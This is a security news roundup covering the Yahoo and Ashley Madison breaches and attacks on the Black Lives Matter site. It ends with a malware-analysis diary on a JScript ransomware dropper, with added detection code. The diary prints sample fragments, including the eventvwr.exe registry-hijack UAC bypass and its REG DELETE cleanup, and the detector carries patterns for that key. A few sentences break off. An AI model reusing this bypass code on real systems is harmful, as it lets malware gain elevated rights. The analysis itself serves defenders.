Information Security News
by Sean Gallagher
On December 14, Yahoo announced that after an investigation into data provided by law enforcement officials in November, the company and outside forensics experts have determined that there was in fact a previously undetected breach of data from over 1 billion user accounts. The breach took place in August 2013, and is apparently distinct from the previous mega-breach revealed this fall—one Yahoo claims was conducted by a "state-sponsored actor".
The information accessed from potentially exposed accounts "may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or unencrypted security questions and answers," Yahoo's chief information security officer Bob Lord reported in the statement issued by the company. "The investigation indicates that the stolen information did not include passwords in clear text, payment card data, or bank account information. Payment card data and bank account information are not stored in the system the company believes was affected."
It's not clear whether the data provided by law enforcement to Yahoo is connected to samples offered on an underground site this past August, particularly since Yahoo still remains unsure of how the user data was spirited out of its systems in the first place. But the breach news doesn't end there.
Ashley Madison, the dating website for married people seeking extramarital affairs, will pay the Federal Trade Commission (FTC) $1.6 million for its failure to protect the account information of 36 million users, for failing to delete account information after regretful users paid a $19 fee, and for luring users with fake accounts of “female” users.
In a press conference call, FTC Chairwoman Edith Ramirez said the commission had secured a $17.5 million settlement, but the company will only pay $1.6 million of that amount due to inability to pay. Ashley Madison's operators are also required to implement a data security program that will be audited by a third party, according to the settlement.
The website was hacked in August 2015, and the hack resulted in the release of user names, first and last names, hashed passwords, partial credit card data, street names, phone numbers, records of transactions, and e-mail addresses. In the wake of the hack, it was discovered that many people who paid the company $20 for a “Full Delete” had been bilked—Ashley Madison parent company Avid Life Media, now Ruby Corporation, had left that data on its servers for up to 12 months after the request had been made.
“Through our e-mails and our social media accounts we get death threats all the time,” said Janisha Gabriel. “For anyone who’s involved in this type of work, you know that you take certain risks.”
These aren’t the words of a politician or a prison guard but of a Web designer. Gabriel owns Haki Creatives, a design firm that specializes in building websites for social activist groups like Black Lives Matter (BLM)—and for that work strangers want to kill her.
When these people aren’t hurling threats at the site’s designer, they’re hurling attacks at the BLM site itself—on 117 separate occasions in the past six months, to be precise. They’re renting servers and wielding botnets, putting attack calls out on social media, and trialling different attack methods to see what sticks. In fact, it’s not even clear whether ‘they’ are the people publicly claiming to perform the attacks.
Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. It's always interesting to have a look at samples coming from alternate sources because they may differ slightly from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from different campaigns, but all based on the same techniques.
The JScript code was, of course, obfuscated, but it was easily readable by a human. Usually, there is no need to implement complex obfuscation to bypass AV detection: this sample had a score of 8/54 on VT. What was different? First of all, it just tries to download two files from a remote server:
The bad guy was lazy (or smart?) and did not implement

    var AACRSODLXACCGDOLOSOX = LXCTAOHOHSYOAASHNDCA("6D696E617331303030");

The hex string is simply the archive password:

    "6D696E617331303030".decode("hex")  ->  minas1000

The destination path is generated via multiple variables and is finally set to C:\Users\[user]\AppData\Local\, user being the victim. The downloaded archive is then extracted with the downloaded 7za.exe (7-Zip) binary, using that password:

    C:\Users\[user]\AppData\Local\7za.exe x C:\Users\[user]\AppData\Local\COCNOACTXATASGNOTOAS -pminas1000 -o C:\Users\[user]\AppData\Local\
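A small triage helper for this kind of "light" obfuscation, added here as an example and not code from the diary or from the sample: it pulls every double-quoted hex literal out of a JScript file, keeps the ones that decode to printable ASCII, and recovers the -p password from a 7za command line. The decoder body, the extra literals and the victim path are constructed for the example; only the variable names and the hex literal come from the article.

```python
import re
import string

# Constructed JScript fragment modelled on the sample in the diary: the
# decoder and variable names are taken from the article, the decoder body
# and the extra literals are made up for this example.
SAMPLE_JS = r'''
var LXCTAOHOHSYOAASHNDCA = function (h) {
    var s = "";
    for (var i = 0; i < h.length; i += 2) {
        s += String.fromCharCode(parseInt(h.substr(i, 2), 16));
    }
    return s;
};
var AACRSODLXACCGDOLOSOX = LXCTAOHOHSYOAASHNDCA("6D696E617331303030");
var BASEDIR = LXCTAOHOHSYOAASHNDCA("433A5C55736572735C");
var NOISE = "DEADBEEF";
'''

# Constructed 7za command line in the shape shown in the diary.
SAMPLE_CMD = ("C:\\Users\\victim\\AppData\\Local\\7za.exe x "
              "C:\\Users\\victim\\AppData\\Local\\COCNOACTXATASGNOTOAS "
              "-pminas1000 -o C:\\Users\\victim\\AppData\\Local\\")

# A double-quoted literal made only of hex digits, at least 4 bytes long.
HEX_LITERAL = re.compile(r'"([0-9A-Fa-f]{8,})"')
# 7-Zip password switch: -p immediately followed by the password.
ARCHIVE_PW = re.compile(r"(?:^|\s)-p(\S+)")
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def decode_hex_literals(js_text):
    """Map each even-length hex literal to its decoding, keeping only
    decodings that are printable ASCII (anything else is likely real
    binary data rather than a hidden string)."""
    found = {}
    for lit in HEX_LITERAL.findall(js_text):
        if len(lit) % 2:
            continue
        try:
            text = bytes.fromhex(lit).decode("ascii")
        except UnicodeDecodeError:
            continue
        if all(c in PRINTABLE for c in text):
            found[lit] = text
    return found


def extract_archive_password(cmdline):
    """Return the password passed to 7za via -p, or None if absent."""
    m = ARCHIVE_PW.search(cmdline)
    return m.group(1) if m else None


if __name__ == "__main__":
    for lit, text in decode_hex_literals(SAMPLE_JS).items():
        print("%s -> %r" % (lit, text))
    print("archive password:", extract_archive_password(SAMPLE_CMD))
```

The printable-ASCII filter is what keeps the output useful on a real script: long hex blobs that are actually embedded binaries decode to garbage and are dropped, while paths, passwords and URLs survive.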
Two new PE files are stored on the file system then executed:
What makes this sample different? After the classic execution of the PE files, it tries to bypass the Windows UAC using a feature of eventvwr.exe. This system tool runs as a high-integrity process and consults the HKCU / HKCR registry hives to start mmc.exe, which finally opens eventvwr.msc. More information about this behaviour is available on the Microsoft website.
The trick is to create the registry entry that is checked by eventvwr.exe and to store the path of the malicious binary (ODASTATACOTSTAODHOOD) in it (the trailing backslash makes RegWrite set the key's default value):

    var WshShell = WScript.CreateObject("WScript.Shell");
    WshShell.RegWrite("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\", ODASTATACOTSTAODHOOD, "REG_SZ");

The path to eventvwr.exe is then built from %WINDIR% and the tool is launched through another WScript.Shell object:

    var ZLGOZYLOLHONHTXTAOOR = environmentVars("WINDIR") + "\\SYSTEM32\\" + "eventvwr.exe";
    AAOGAODYSCSTSOAOLHAC = new ActiveXObject("Wscript.Shell");

Finally, the registry entry is deleted to clean up:

    var wshShell = new ActiveXObject("WScript.Shell");
    wshShell.Run("REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f");
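Each of the three steps above leaves a footprint that endpoint telemetry can catch. As an added example, not part of the diary, here is a detector over Sysmon-style events (Event ID 13 registry value set, Event ID 1 process create; the field names Image, ParentImage, TargetObject, Details, CommandLine and IntegrityLevel are Sysmon's own). The event records, timestamps, SID and victim paths are constructed for the example; the registry key, the REG DELETE command line and the payload name come from the article.

```python
import re

# Constructed Sysmon-style records (not real logs), limited to the fields
# needed here. Sysmon Event ID 13 is a registry value set, Event ID 1 a
# process creation; Sysmon writes HKCU keys as HKU\<user SID>\....
WSCRIPT = r"C:\Windows\System32\wscript.exe"
EVENTVWR = r"C:\Windows\System32\eventvwr.exe"
PAYLOAD = r"C:\Users\victim\AppData\Local\ODASTATACOTSTAODHOOD"

SAMPLE_EVENTS = [
    {"EventID": 13, "UtcTime": "2016-12-15 10:00:01", "Image": WSCRIPT,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes"
                     r"\mscfile\shell\open\command\(Default)",
     "Details": PAYLOAD},
    {"EventID": 1, "UtcTime": "2016-12-15 10:00:02", "Image": EVENTVWR,
     "ParentImage": WSCRIPT, "IntegrityLevel": "High",
     "CommandLine": r"C:\Windows\SYSTEM32\eventvwr.exe"},
    {"EventID": 1, "UtcTime": "2016-12-15 10:00:03", "Image": PAYLOAD,
     "ParentImage": EVENTVWR, "IntegrityLevel": "High",
     "CommandLine": PAYLOAD},
    {"EventID": 1, "UtcTime": "2016-12-15 10:00:04",
     "Image": r"C:\Windows\System32\reg.exe", "ParentImage": WSCRIPT,
     "IntegrityLevel": "Medium",
     "CommandLine": r"REG DELETE HKCU\Software\Classes\mscfile\shell\open\command /ve /f"},
    # Benign: Event Viewer opened normally, eventvwr.exe launches mmc.exe.
    {"EventID": 1, "UtcTime": "2016-12-15 11:30:00",
     "Image": r"C:\Windows\System32\mmc.exe", "ParentImage": EVENTVWR,
     "IntegrityLevel": "High",
     "CommandLine": r"C:\Windows\system32\mmc.exe C:\Windows\system32\eventvwr.msc"},
]

# The hijacked handler key, in registry paths and in command lines.
MSCFILE_CMD = re.compile(r"\\Classes\\mscfile\\shell\\open\\command", re.IGNORECASE)
# reg.exe / REG invoked with the DELETE verb.
REG_DELETE = re.compile(r"\breg(?:\.exe)?\s+delete\b", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_eventvwr_bypass(events):
    """Return one alert per event that matches a stage of the technique:
    the handler write, an unexpected child of eventvwr.exe, the cleanup."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        when = ev.get("UtcTime")
        if eid == 13 and MSCFILE_CMD.search(ev.get("TargetObject", "")):
            alerts.append({"rule": "mscfile_handler_written", "UtcTime": when,
                           "Image": ev.get("Image"), "Details": ev.get("Details")})
        elif eid == 1:
            parent = basename(ev.get("ParentImage", ""))
            child = basename(ev.get("Image", ""))
            cmd = ev.get("CommandLine", "")
            # Legitimately, eventvwr.exe only ever starts mmc.exe.
            if parent == "eventvwr.exe" and child != "mmc.exe":
                alerts.append({"rule": "eventvwr_unexpected_child", "UtcTime": when,
                               "Image": ev.get("Image"),
                               "IntegrityLevel": ev.get("IntegrityLevel")})
            if REG_DELETE.search(cmd) and MSCFILE_CMD.search(cmd):
                alerts.append({"rule": "mscfile_handler_cleanup", "UtcTime": when,
                               "Image": ev.get("Image"), "CommandLine": cmd})
    return alerts


def is_full_chain(alerts):
    """True when both the handler write and an unexpected child of
    eventvwr.exe were seen, i.e. the bypass very likely succeeded."""
    rules = {a["rule"] for a in alerts}
    return {"mscfile_handler_written", "eventvwr_unexpected_child"} <= rules


if __name__ == "__main__":
    found = detect_eventvwr_bypass(SAMPLE_EVENTS)
    for a in found:
        print(a)
    print("full bypass chain:", is_full_chain(found))
```

The registry write is the earliest and most specific signal: a medium-integrity script writing mscfile\shell\open\command has no legitimate reason to exist, and it fires before the elevated payload runs. The cleanup rule matters because the sample deletes the key right away, so a scan of the live registry after the fact will find nothing.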
More information about this technique to bypass UAC is available on github.com, with a PoC script in PowerShell.
If you receive interesting samples, feel free to share them! We always need fresh meat!
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant